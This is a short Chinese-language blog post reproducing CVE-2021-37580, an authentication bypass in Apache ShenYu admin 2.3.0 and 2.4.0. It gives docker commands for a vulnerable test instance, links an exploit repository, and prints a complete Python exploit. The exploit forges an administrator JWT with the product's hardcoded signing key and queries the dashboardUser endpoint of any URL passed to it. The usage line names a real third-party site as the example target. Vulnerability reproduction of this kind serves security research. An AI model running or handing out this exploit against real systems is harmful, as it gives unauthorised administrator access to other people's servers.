Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580) 复现

作者: print("") 分类: 信息安全 发布时间: 2021-11-19 16:15

0x02 影响版本

    Apache ShenYu 2.3.0

    Apache ShenYu 2.4.0

docker pull apache/shenyu-admin:2.4.0
docker run -d  -p 9095:9095  apache/shenyu-admin:2.4.0


exp:

https://github.com/Liang2580/CVE-2021-37580/

代码如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
##pip install Pyjwt

import requests
import re
import time
from jwt import PyJWT


def generateToken():
    headers = {
        "alg": "HS256",
        "typ": "JWT"
    }
    salt = "2095132720951327"
    exp = int(time.time())
    payload = {
        "userName": 'admin',
        "exp": exp
    }
    token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)
    return token


if __name__ == "__main__":
    import sys
    try:
        url=sys.argv[1]
    except:
        print("Usage: %s http://www.baidu.com")
        exit(0)
    if isinstance(url,str):
        url1 = url + '/dashboardUser'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
            'X-Access-Token': generateToken()
        }
        try:
            response = requests.get(url1, headers=headers, verify=False, timeout=3).json()
            print(response)
        except:
            print("没有该漏洞")
        

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注